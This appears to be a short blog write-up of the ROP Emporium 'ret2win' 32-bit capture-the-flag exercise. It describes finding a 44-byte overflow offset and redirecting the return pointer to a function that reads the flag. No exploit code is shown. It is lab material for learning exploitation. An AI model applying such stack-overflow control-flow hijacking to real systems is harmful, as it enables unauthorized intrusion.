ROP ROP #1

ROP ROP #1

Before you proceed any further, make sure you have all the requirements fulfilled.

  • ASM knowledge
  • Debugger familiarity
  • GDB
  • Basic ROP knowledge
  • Brain

Setup

In this post, we will try to learn ROP (Return Oriented Programming) by using ropemporium ret2win 32bit binary. Lets setup our machine for debugging by installing PEDA and downloading the target binary.

We have downloaded the binary and extracted it, time to start gdb.

 Crash

We have found the offset at 44 which means that the EIP will hold the next 4bytes. We will use a custom boiler plate to ease our exploit development for this binary which can be found in the final exploit.

Flag

This binary is pretty easy to exploit since it imports the system function and has the ‘/bin/cat flag.txt’ string inside the data section. Lets analyze this binary in a disassembler, I will be using Hopper Disassembler for this however you can simply type ‘pdisass ret2win‘ inside gdb to view the same results.

We can see that the ret2win function in this binary itself pushes the memory address of string ‘/bin/cat flag.txt’ to stack and then calls the system() which is indeed very helpful for our objective. We will simply point our return pointer to the start of our ret2win function and be done with it.

We got the flag which is the main objective. I tried to find a way to spawn a shell but didn’t found any useful rop gadgets to do so, our input is truncated after 49 bytes i guess so only 1 byte overwrite in the stack after our return pointer overwrite.

——END——

Leave a Reply

Your email address will not be published. Required fields are marked *